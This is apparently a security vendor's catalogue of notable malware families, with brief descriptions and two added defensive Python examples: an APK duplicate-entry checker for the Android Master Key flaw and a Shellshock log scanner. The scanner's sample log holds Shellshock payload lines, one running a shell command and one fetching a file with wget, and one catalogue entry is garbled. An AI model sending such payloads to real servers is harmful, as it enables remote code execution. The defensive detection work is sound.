Threat Descriptions

Notable threats

Over the years, some threats have gained infamy for being technological or historical milestones.

Some were the first to introduce a novel feature or technique. Others were able to infect a system, program or institution that was considered 'impregnable' at the time. And a few caused a considerable amount of annoyance or disruption to a lot of users.

Listed below is a small sample of the most notable malware we've seen so far.

These programs are known for being used in targeted espionage campaigns focused on government, military or industrial organizations.


Backdoor:W32/BlackEnergy is a crimeware toolkit that has been modified for use in information gathering in advanced persistent threat (APT) attacks.


Backdoor:W32/Duqu silently installs files on the infected system, then collects confidential information from the system and forwards it to a remote Command and Control (C&C) server. Duqu is reportedly targeted at specific organizations, possibly with a view to collecting specific information that could be used in a later attack.


Havex is a Remote Access Tool (RAT) used in targeted attacks. Havex is known to have been used in attacks targeted against various industrial sectors, particularly the energy sector. Variants seen circulating in the spring of 2014 were modified to target organizations involved in developing or using industrial applications or appliances.


Backdoor:W32/Moudoor is a derivative of the notorious Gh0st Remote Access Tool (RAT) that is notable for being a favored tool of a cyberespionage group that has been working since 2010 and targeting industries such as financial services, government departments and education facilities around the world.


Backdoor:W32/OnionDuke (both A and B variants) are DLL files dropped by Trojan-Dropper:W32/OnionDuke and used to download and execute additional malicious components on the affected system.


Flame is a sophisticated information-gathering program used in targeted cyber-attacks against organizations and nation states in the Middle East.


Rootkit:W32/Regin is a complex espionage toolkit used to keep itself and other malicious components from being detected on an infected system. This malware has reportedly been used to target a variety of organizations around the world.


Trojan-Dropper:W32/CosmicDuke steals information from an infected system using keylogging, screen captures and stealing file and clipboard data. Harvested data is forwarded to a remote server via FTP.


Trojan-Dropper:W32/Stuxnet automatically executes itself and drops files onto the system by exploiting a vulnerability in various Windows versions (CVE-2010-2568) that allows malicious code to run when the icon of a specially crafted shortcut (.LNK) file is displayed. This malware appears to be targeted at businesses using Siemens SIMATIC WinCC database applications, as its payload involves data theft from these resources.

Ransomware extorts money from users by taking control of their devices or data, then demanding a ransom payment to restore the affected device or content. For more about such threats, see Article: Crypto-ransomware and Article: Removing police-themed ransomware.


Petya is unusual because, instead of encrypting individual files, it overwrites the computer's Master Boot Record (MBR) with its own boot code and, after forcing a reboot, encrypts the disk's Master File Table (MFT), leaving the system unable to boot. It then demands payment of a ransom in order to obtain the key needed to restore normal access.


Users typically encounter TeslaCrypt crypto-ransomware by being exposed to an exploit kit (usually by visiting a compromised website, or by being redirected to a malicious one). If the kit successfully exploits the user's machine, it will download the ransomware.


This crypto-ransomware encrypts files stored on the machine. Users typically encounter Locky ransomware either by being exposed to an exploit kit or via a spam email message with a file attachment.


This crypto-ransomware encrypts files on the machine and demands payment in return for the decryption key needed to restore the affected content.


Cryptolocker encrypts files on the compromised computer and demands a ransom to provide the decryption key needed to decrypt the files.


This crypto-ransomware encrypts files on the affected machine and demands payment in return for the decryption key needed to restore the affected content.


Trojan:Android/SLocker.A is reportedly the first Android ransomware that uses file encryption. It is also noted for its use of the Tor anonymizing network to communicate with its controller.


Reveton is 'police-themed' ransomware that appears to 'lock' the user's computer, and displays a fake notice, allegedly from a local law enforcement authority.


Browlock is 'police-themed' ransomware which displays a 'lock screen' purportedly from a local or federal law enforcement authority, claiming that the machine has been locked and encrypted due to 'illegal activities'. A 'fine' is then demanded to restore the system.

Crimeware programs such as these are used by their controllers to steal something of value from the user, whether it be money, data or control of the computer or mobile device. For more about such threats, see Article: Botnets and Article: Exploit Kits.


Exploit:Java/Blackhole identifies a Java class module used as part of an exploit kit known as Blackhole.


FlashPack is an exploit kit that attempts to exploit vulnerabilities in a user's computer or mobile device (or in the programs installed on it). If successful, FlashPack will then download additional malware onto the compromised device.


SweetOrange is an exploit kit that runs various exploits against the user's computer in order to probe for any vulnerabilities present in programs installed on the machine, or in the computer's operating system itself; if the exploit(s) are successful, then the user's machine may be compromised and exposed to further intrusion.


Rootkit:W32/Necurs is a standalone malware that was first seen in 2011, but gained more prominence once it started being used in the Gameover Zeus botnet.


Rootkit:W32/ZAccess constantly displays advertisements on the infected machine and may silently contact remote servers to retrieve additional advertising information.


Trojan:W32/Zbot (also known as Zeus or Wsnpoem) is a large family of malware that steals information from an infected system.


Trojan:W32/BandarChor is ransomware that steals control of the user's machine or data, then demands a payment from the user to restore normal access to the ransomed content or system.


Trojan:W32/Cryptowall is a ransomware that silently encrypts files on the user's machine and demands a ransom to provide the decryption key needed to decrypt the files.


Trojan:W32/DNSChanger changes the infected system's Domain Name System (DNS) server settings in order to divert traffic to unsolicited, and potentially illegal, sites.


Virus:W32/Ramnit is a family of viruses that infect EXE, DLL and HTML files found on the computer. Depending on the variant, Ramnit-infected machines can also be enslaved in a botnet.


Virus:W32/Sality refers to a large family of viruses that infect executable files.

Though relatively new, Android malware has developed rapidly, with new features and behaviors emerging in quick succession on the platform.


Exploit:Android/GingerBreak is a piece of code that exploits a vulnerability (CVE-2011-1823) in Android operating systems before version 2.3.4 to gain root privileges on the affected device.


HtcLoggers.A is a preinstalled application that might leak confidential information to other applications.


Exploit:Android/Masterkey identifies code designed to exploit a known vulnerability in the way the Android operating system verifies the authenticity of an app: an app package (a ZIP archive) could carry two entries with the same name, and the component that checked the signature hashed a different copy from the one the installer actually unpacked, so unsigned code could be installed under a valid signature.
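The following is an added example, not F-Secure's code or the Masterkey exploit itself: it performs the check that defeats the condition described above, looking for repeated entry names in an APK's central directory. The APK-shaped archive is constructed inline (the signature files are placeholders), so it runs offline.

```python
"""Detect the Android 'Master Key' condition: an APK (a ZIP archive) whose
central directory lists the same entry name twice. The signature verifier
hashed one copy while the installer extracted the other, so the bytes that
were checked and the bytes that ran could differ. The sample archive is
constructed below; no real app is involved."""
import io
import warnings
import zipfile
from collections import Counter


def duplicate_entries(archive_bytes: bytes) -> list[str]:
    """Return every entry name that appears more than once in the archive.

    Python's zipfile keeps all central-directory records in infolist(), so
    duplicates are visible here even though ZipFile.read(name) would only
    ever hand back one of them (which is exactly the ambiguity abused)."""
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        counts = Counter(info.filename for info in zf.infolist())
    return sorted(name for name, n in counts.items() if n > 1)


def is_master_key_candidate(archive_bytes: bytes) -> bool:
    """An archive with any repeated name cannot be trusted: the signed copy
    and the installed copy of that entry may not be the same."""
    return bool(duplicate_entries(archive_bytes))


def build_sample_apk(with_duplicate: bool) -> bytes:
    """Constructed sample: a minimal APK-shaped ZIP. When with_duplicate is
    set, a second 'classes.dex' (the attacker's copy) is appended after the
    signed one. zipfile warns about the repeated name but still writes it,
    which is what a tampered package looks like on disk."""
    buf = io.BytesIO()
    with warnings.catch_warnings():
        warnings.simplefilter("ignore", UserWarning)
        with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
            zf.writestr("AndroidManifest.xml", b"<manifest/>")
            zf.writestr("classes.dex", b"dex\n035\x00signed code")
            zf.writestr("META-INF/MANIFEST.MF", b"Manifest-Version: 1.0\n")
            zf.writestr("META-INF/CERT.SF", b"Signature-Version: 1.0\n")
            zf.writestr("META-INF/CERT.RSA", b"placeholder, not a real PKCS#7 blob")
            if with_duplicate:
                zf.writestr("classes.dex", b"dex\n035\x00injected code")
    return buf.getvalue()


if __name__ == "__main__":
    for label, dup in (("clean", False), ("tampered", True)):
        apk = build_sample_apk(dup)
        print(label, duplicate_entries(apk), is_master_key_candidate(apk))
```

Android's own fix took the same approach, rejecting a package whose central directory repeats a name rather than trying to decide which copy is the "real" one.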


DroidRooter is a family of binary exploits that is used to gain root privilege on an Android device.


Cracker.A is a tool that can be used to override the security policy of the Microsoft Exchange corporate email service.


LoicDos.A is a program that turns an infected device into a bot, which is then used to perform denial of service (DoS) attacks on a targeted server.


MemPoDroid.A is a tool that exploits a flaw in the mem_write function (the /proc/<pid>/mem write handler, CVE-2012-0056) of the Linux kernel used by Android; successful exploitation grants the attacker root privileges on the compromised device.


SMBCheck.A is a tool that checks whether a vulnerable SMBv2 server is present on a system running a Microsoft Windows operating system.


TattooHack.A is an exploit that lets the user bypass a security constraint on HTC Tattoo devices.


Trojan-Downloader:Android/Boqx refers to a maliciously repackaged version of a popular gaming application.


Trojan-Downloader:Android/FakeVideo silently connects to remote sites and attempts to download additional applications onto the device.


Morepak.A connects to a remote server, and proceeds to download malicious files onto the device.


Trojan-Downloader:Android/RootSmart forwards device details to a remote server, and downloads and installs additional applications onto the compromised device.


NotCompatible.A infects a device using a drive-by download method, gaining entry to the device when the user visits a compromised website.


Trojan-Spy:Android/Antares collects and forwards device details to a remote server, as well as saving the information to the SD card and to a local web server that provides viewing access to the data via a web page.


Trojan-Spy:Android/Lovetrap silently sends SMS messages to premium-rate numbers, and also forwards device information to a remote server.


Trojan-Spy:Android/Smforw variants silently forward incoming SMS messages on an infected device to a remote server.


Trojan-Spy:Android/Sscul variants steal information from the affected device and forward the details to a remote server. More unusually, Sscul variants attempt to infect Windows machines connected to the device by exploiting the AutoRun feature.


Trojan-Spy:Android/Wabek.A collects phone numbers from the infected device and signs up the user for premium mobile services.

Though generally considered to be more 'secure' platforms, the operating systems produced by Apple have their own share of malicious programs.


Once installed on a system, Backdoor:OSX/Clientsnow allows a remote attacker to silently perform actions on the infected machine.


Backdoor:OSX/DevilRobber.A silently installs applications related to Bitcoin-mining; it may also harvest data from the infected machine and listen for additional commands from a remote user.


Backdoor:OSX/Imuler.A contacts a remote server for instructions; it may then steal files or capture a screenshot of the infected computer system, which is then forwarded to the remote server.


Backdoor:OSX/Iworm connects affected Mac OS X machines to a botnet and is capable of executing a range of commands. At the time of writing, there have been no reports of the Iworm botnet being used for malicious activities.


Backdoor:OSX/Olyx.A connects to a remote server to receive further instructions, without knowledge or permission from the user.


Once installed on a system, Backdoor:OSX/XSLCmd waits for instructions from a remote server and executes them on the infected machine.


Backdoor:OSX/MacKontrol.A connects to a remote server to receive further instructions, without the user's knowledge or permission.


Backdoor:OSX/Sabpab.A connects to a remote server to receive further instructions, without the user's knowledge or permission.


Backdoor:OSX/iWorkServ.A is a trojan backdoor that installs itself on Mac OSX computers.


Backdoor:iPhoneOS/XCodeGhost identifies iOS apps that include code introduced when the software was created using a maliciously-modified version of the Xcode app creation framework.


Backdoor:iPhoneOS/Xsser is a mobile Remote Administration Tool (RAT) that was reportedly found on iOS devices.


Exploit:iPhoneOS/CVE-2014-4377 identifies a maliciously crafted PDF document that attempts to exploit the CVE-2014-4377 vulnerability in iOS 7.1.x; successful exploitation would allow an attacker to remotely execute arbitrary code on the affected device.


Rogue antivirus software that tricks users into buying or installing it, usually by infecting the user's computer or by claiming that the computer is infected.


Trojan-Downloader:OSX/Flashback is a family of malicious applications which when installed on a computer will download a payload from a remote site, then modify targeted webpages displayed in the web browser. Variants in the Flashback family may include additional malicious functionalities or characteristics.


Trojan-Downloader:OSX/Jahlev.A entices the user into downloading a fake video codec that supposedly fixes an ActiveX object error. The downloaded file is a mountable disk image (DMG) file of the kind Mac OS X uses to install applications, and contains an installer package named "install.pkg".


Trojan-Dropper:OSX/Revir.A drops a downloader component that downloads a backdoor program onto the system, while camouflaging its activity by opening a PDF file to distract the user.


Trojan:OSX/Loosemaque.A appears to be a video game, but deletes files from the user home folder when a user plays it.



Trojan:iPhoneOS/SSLCredsThief.A listens to the outgoing SSL connections from a jailbroken iPhone in order to steal the device's Apple ID.


Trojan:iPhoneOS/Adthief.A hijacks the advertisement modules used by other installed apps to display its own advertisements.


Worm:iPhoneOS/Ikee is the first worm to target the Apple iPhone. Its most notable action involves changing the background wallpaper on the device.


Worm:iPhoneOS/Ikee.B is the second variant of the Ikee worm and the first with a clearly malicious payload.

Worm:OSX/Tored.A is a worm that propagates through infected e-mails and is capable of functioning as a backdoor and keylogger.

Unlike most malware today, which focuses on the Windows operating system, the following are notable for targeting alternative platforms.


The Backdoor:Linux/Meche family covers a wide base of variants that are based on the EnergyMech IRC bot. The bot is widely used by miscreants to compromise Linux installations.


Backdoor:Linux/Shellshock.A identifies files that attempt to exploit the CVE-2014-6271 vulnerability in the Bash shell. If successfully exploited, this vulnerability allows remote attackers to execute code on the affected system. The vulnerability affects Unix-based operating systems, including Linux and Mac OS X.
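As an added example (not part of the original description and not the Shellshock.A sample), the following detection logic shows what the CVE-2014-6271 trigger looks like from the defender's side. A CGI-capable web server copies request headers into environment variables, and vulnerable Bash treated any environment value beginning with the exact prefix "() {" as an exported function definition, continuing to parse (and execute) whatever followed the closing brace. The log lines are constructed for the example; the addresses in them are documentation ranges.

```python
"""Scan web-server log lines for Shellshock (CVE-2014-6271) triggers.

A CGI-capable server copies request headers into environment variables
(HTTP_USER_AGENT, HTTP_REFERER, HTTP_COOKIE, ...). Vulnerable bash, on
start-up, treated any environment value beginning with the exact prefix
"() {" as a function definition and kept executing past the closing
brace. So the check is: does any header value begin with "() {"?
The log lines below are constructed for this example."""
import re
from dataclasses import dataclass

# The exact prefix vulnerable bash compared against when importing
# functions from the environment.
TRIGGER = "() {"

# Double-quoted fields in a combined-format line: request line, referer,
# user-agent. Backslash-escaped quotes inside a field are tolerated.
QUOTED = re.compile(r'"((?:[^"\\]|\\.)*)"')


@dataclass
class Hit:
    line_no: int
    client: str
    header_value: str
    payload: str


def trailing_command(value: str) -> str:
    """Return the command placed after the function body, e.g.
    "/bin/bash -c 'id'" from "() { :;}; /bin/bash -c 'id'"."""
    end = value.find("}")
    if end == -1:
        return ""
    return value[end + 1:].lstrip(";").strip()


def scan_log(text: str) -> list[Hit]:
    """Flag every line where a header field (any quoted field after the
    request line) begins with the trigger prefix."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        client = line.split(" ", 1)[0]
        fields = QUOTED.findall(line)
        for value in fields[1:]:  # fields[0] is the request line itself
            if value.startswith(TRIGGER):
                hits.append(Hit(line_no, client, value, trailing_command(value)))
    return hits


# Constructed sample: lines 1 and 2 carry real triggers (User-Agent and
# Referer respectively); line 4 has the text mid-value, which bash ignores;
# line 5 uses "(){", which vulnerable bash never imported, although many
# IDS rules still match it.
SAMPLE_LOG = """\
203.0.113.7 "GET /cgi-bin/status HTTP/1.1" 200 "-" "() { :;}; /bin/bash -c 'id'"
203.0.113.7 "GET /cgi-bin/status HTTP/1.1" 200 "() { test;};/usr/bin/wget http://198.51.100.9/x" "curl/7.37"
198.51.100.4 "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.4 "GET /docs/functions.html HTTP/1.1" 200 "-" "Mozilla/5.0 () { not a trigger mid-value"
192.0.2.55 "GET /cgi-bin/test.cgi HTTP/1.1" 500 "-" "(){ :;}; echo vulnerable"
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit.line_no}: {hit.client} -> {hit.payload!r}")
```

The strict prefix match is deliberate: it is the condition the vulnerable code actually checked, so it catches the requests that would have executed while leaving a benign string that merely contains "() {" somewhere in the middle alone. Widen it to `\(\)\s*\{` if you prefer to see probes that could not have fired.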


DroidRooter.A is a binary exploit that is used to gain root privilege on an Android device.


This worm is related to This worm was found on Monday the 30th of September 2002.


Adore is a worm that spreads in Linux systems using four different, known vulnerabilities already used by the Ramen and Lion worms. These vulnerabilities concern BIND named, wu-ftpd, rpc.statd and lpd services.


This virus spreads only under the Linux operating system, infecting ELF executables. Found in the wild in February 1997, Bliss is the second known Linux virus (the first being Staog).


Kork is a worm that uses the known vulnerability in lpd service to propagate from a vulnerable Linux system to another. This service is part of the default installation of Red Hat Linux 7.0.


Ramen is an Internet worm that propagates from one Linux-based server to another. It works in a similar way to the Morris Worm that spread across the Internet in 1988.


This virus spreads only under the Linux operating system, infecting ELF executables. Found in the fall of 1996, Staog is the first known Linux virus.


Typot is a Linux trojan designed to perform distributed port scanning. One peculiarity of this trojan is that it generates TCP packets with a window size of 55808.


Virus.Win32.Bi.a is a proof-of-concept virus that infects i386 Windows Portable Executable (PE) and Linux ELF files.

Liberty (Palm)

LIBERTY.A is a simple trojan written for the 3Com Palm platform. When activated, the trojan deletes all application files on the device.


Palm/MTX_II.A is a 'greeting card' Palm application dropped by MTX_II.A Windows virus. The Palm application itself is not malicious but it is dropped as a payload of MTX_II.A.


Obfu is a family of PHP backdoors that operate on any PHP enabled system. The variants belonging to this family are usually heavily obfuscated to prevent an outright detection of their functionality.


Backdoor:Python/Janicab.A is capable of running on both Windows and OS X machines; once installed it continuously takes screenshots and records audio, then forwards these to its command and control server.


Backdoor:Solaris/Wanukdoor.A is dropped by Worm:Solaris/Wanuk.A. It opens port 32982 which provides access to a remote user.


Exploit:PHP/Preamble is a detection for a family of various PHP scripts. The scripts are used to test whether a particular site is vulnerable to Remote File Inclusion (RFI) exploitation.


Bluetooth-Worm:SymbOS/Cabir identifies a large family of Bluetooth worms that run on Symbian mobile phones supporting the Series 60 platform.


Feak is a proof-of-concept worm that was created and publicly released by researchers at the University of California, Santa Barbara. The source code of the worm is also available along with the binaries on the Internet.


Trojan-Dropper:SymbOS/StealWar is a family of trojan programs, which are usually distributed as malicious SIS files.


Trojan-Spy:SymbOS/Flexispy.A is a spyphone application that allows a user to monitor calls and messages on a targeted phone. The application must be manually installed on the phone in order for the program to operate.


Trojan:SymbOS/Appdisabler.A is a malicious SIS file dropper, which is dropped by the Skulls.J trojan.


Bootton.A is a trojan distributed by Trojan:SymbOS/Onehop.A over Bluetooth as a malicious SIS file named 'ILoveU.sis'.


Trojan:SymbOS/Cardblock.A is a trojanized version of the Symbian application InstantSis created by Biscompute.


Trojan:SymbOS/Doomboot.A drops corrupted system binaries and Worm:SymbOS/Commwarrior.B onto the infected device. The system files dropped by Doomboot.A cause the device to fail at the next reboot.


SymbOS/RommWar is a malicious SIS trojan that installs a malfunctioning system component that causes the phone to freeze, requiring a restart.


Trojan:SymbOS/Singlejump is a family of trojans that infect devices running the Symbian operating system. On execution, variants in the family replace built-in and third party applications on the device with components that reset the phone if launched.


Trojan:SymbOS/Skulls is distributed in a malicious SIS file named "Extended theme.SIS", allegedly a theme manager for Nokia 7610 smart phone (authored by "Tee-222").


Trojan:SymbOS/Romride is a family of trojans that install malfunctioning system configuration components on the device. When the affected device is started, the phone may fail to complete startup.


Variants in the Worm:SymbOS/Commwarrior family are worms that infect devices running the Symbian S60 2nd Edition operating system. Commwarrior can propagate over both Bluetooth and Multimedia Message (MMS) networks.

These threats were milestones in the history of malicious computer programming, usually for introducing new features or ways of spreading. Some also became noted in mainstream media at the time for causing major epidemics.


The Aliz worm spread widely at the end of November 2001. The worm activates automatically when an infected email message is read.


Email-Worm:W32/Nyxem propagates through infectious e-mail file attachments. It is also capable of spreading over a local network. Once installed on a computer, the worm can kill the processes of several applications, as well as preventing other malware from running. Nyxem can also perform a Denial of Service (DoS) attack.


Lovsan is a network worm that spreads by exploiting the RPC/DCOM (MS03-026) vulnerability in Windows.


Nimda is a complex virus with a mass mailing worm component which spreads itself in e-mail attachments named README.EXE. It affects Windows 95, Windows 98, Windows Me, Windows NT 4 and Windows 2000 users.


Net-Worm:W32/Sasser refers to a small family of worms that spread to new hosts over the Internet by targeting the known MS04-011 (LSASS) vulnerability, which is caused by a buffer overrun in the Local Security Authority Subsystem Service.


Stoned.Angelina was reported to be in the wild in Finland in November 1994. In October 1995 it was found on new Seagate 5850 (850 MB) IDE hard disks.


The CIH virus was first located in Taiwan in early June 1998 and was subsequently confirmed to be in the wild worldwide. It was among the ten most common viruses for several months. CIH spread very quickly because it was distributed through pirated software.


Virus:W97M/Concept, also known as Word Prank Macro or WW6Macro, is a macro virus written in the Microsoft Word v6.x macro language (WordBasic). It was reported in several countries and had no trouble propagating in the wild. WM/Concept was extremely widespread during 1995-1997. Nowadays, it is almost (but not completely) extinct.


Slapper is a network worm that spreads on Linux machines by using a flaw discovered in August 2002 in OpenSSL libraries. The worm was found in Eastern Europe late on Friday September 13th 2002.


Worm:VBS/Onthefly (also known as VBS/VBSWG) is an encrypted Visual Basic Script worm which spreads itself through mass-mailing via the Microsoft Outlook application.


A standalone malicious program which uses computer or network resources to make complete copies of itself.


Worm:W32/Netsky refers to a large family of worms which spread in infectious files attached to fake e-mail messages. Netsky was originally named Moodoom, or I-Worm.Moodoom.


Worm:W32/Slammer sparked off a major epidemic in January 2003. Slammer exploited a buffer overflow vulnerability in Microsoft SQL Server 2000 (MS02-039) in order to propagate.


The Sobig worm was found in the wild on January 9th 2003. The worm spreads via email and network shared drives. It also tries to download other files from web pages located on a Geocities site.


A new variant of Worm:W32/Sobig, known as Sobig.F, was first found on August 19th, 2003 and spread rapidly in the wild.


Brain is possibly the oldest virus known on the DOS platform, as it was first detected in January '86.


Email-Worm:W32/Sober disguises itself as a security warning for a possible new worm and a fix coming from an Anti-Virus company. The worm uses attachment names such as anti_virusdoc.pif, check-patch.bat, playme.exe.


The Win95/Marburg virus got widespread circulation in August 1998, when it was included on the master CD of the popular MGM/EA PC CD-ROM game "Wargames".

Morris Worm

The Morris Worm was a Unix-based worm program that spread widely across the Internet in November 1988.


The Ping-Pong virus (also called "Bouncing Ball" or "Italian") was probably the most common and best known boot sector virus for a while, although the Stoned virus now outnumbers it.


Virus:Boot/Ripper infects floppy disk boot records and hard disk Master Boot Records (MBRs). The virus is encrypted with a variable key, which is quite rare among boot sector viruses.


The Stoned.Monkey virus was first discovered in Edmonton, Canada, in the year 1991. The virus spread quickly to USA, Australia and UK. Monkey is one of the most common boot sector viruses.


Elkern is a low-polymorphic cavity infector virus with network spreading capabilities. The virus first appeared on 25th-26th of October 2001.


Virus:Boot/Stoned is a simple virus that seems to have been designed to be harmless. Due to a mistake, however, it did not quite work out that way. Stoned is able to infect the boot sectors of floppy disks. The virus has spawned a large number of variants. Stoned was one of the most widespread viruses in existence.


Virus:W97M/Walker, also known as Virus:W97M/Satellite, is a Word macro virus with extraordinary functions.


Worm:SymbOS/Yxe is the first malicious software to target Symbian S60 3rd Edition Phones.


This is the original Code Red web worm (the A variant), first found in July 2001.


CodeRed.F is almost identical to CodeRed II, with just two bytes changed. CodeRed II stopped spreading at the end of 2002; the change in CodeRed.F removes this expiry and enables it to spread indefinitely.


Magistr is a very dangerous memory resident Win32 worm combined with virus infection routines. It was found in-the-wild in the middle of March 2001.


This is the first worm to use Adobe Acrobat PDF format as a platform. However, it only works under the full 'developer' version of Acrobat. The common Acrobat Reader program is not affected by this worm.


Worm:W32/Welchi is unusual in that it attempts to disinfect the computer system from Worm:W32/Lovsan infections. It also attempts to patch the vulnerability used by the Lovsan worm to propagate.
